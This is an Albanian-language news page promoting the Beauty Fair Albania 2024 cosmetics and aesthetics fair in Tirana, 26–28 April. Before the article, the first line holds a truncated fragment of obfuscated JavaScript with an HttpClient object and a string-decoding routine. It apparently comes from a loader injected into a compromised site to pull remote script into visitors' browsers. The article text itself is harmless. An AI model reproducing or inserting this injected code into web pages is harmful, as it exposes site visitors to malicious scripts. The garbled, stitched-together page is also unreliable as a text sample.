;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shënoni datat! Vjen eventi më i madh i bukurisë, Beauty Fair Albania 2024

By

Nisja e sezonit të pranverës, nuk shënon vetëm rritjen e temperaturave, por edhe ardhjen e eventit më të madh të bukurisë në Shqipëri dhe Kosovë: BEAUTY FAIR ALBANIA 2024. Panairi profesional që prej 6 vitesh ka vëne standart ne tregun e kozmetikes.

Pallati i Kongreseve do të presë në të 3 ditet e tij qindra mijë vizitorë dhe do të jetë shtëpia e dhjetëra bizneseve të bukurisë në vend, të cilët do të jenë afër me publikun në datat 26-27-28 Prill.

Beauty Fair Albania nisi rrugëtimin e saj në vitin 2019 dhe përgjatë këtyre 6 viteve ka bërë bashkë ekspertë të bukurisë nga të gjitha trojet shqiptare e jo vetëm. Kozmetologë, estetiste, mjeke, make up artistë, sipërmarrës, të apasionuar pas bukurisë dhe vizitorë që tashmë jane abonent të përvitëshëm të panairit.

Përgjatë 3 ditëve të panairit ju do të keni mundësinë të prekni nga afër inovacionet e fundit ne kozmetik dhe suplementeve shëndetësore, aparaturat e fundit teknologjike mjeksore dhe estetike. Në panair do të keni gjithashtu mundësinë të shkëmbeni eksperienca me ekspertë të fushës, për të marrë këshilla dhe për të mësuar me shumë rreth produkteve dhe shkencës së fundit të fushës së bukurosë dhe mjekësisë.

Moti premton ditë të bukura në 26-27-28 prill, por Beauty Fair Albania 2024 premton të reja prandaj ju mirëpresim për një eksperiencë të paharrueshme.

Artikuj të ngjashëm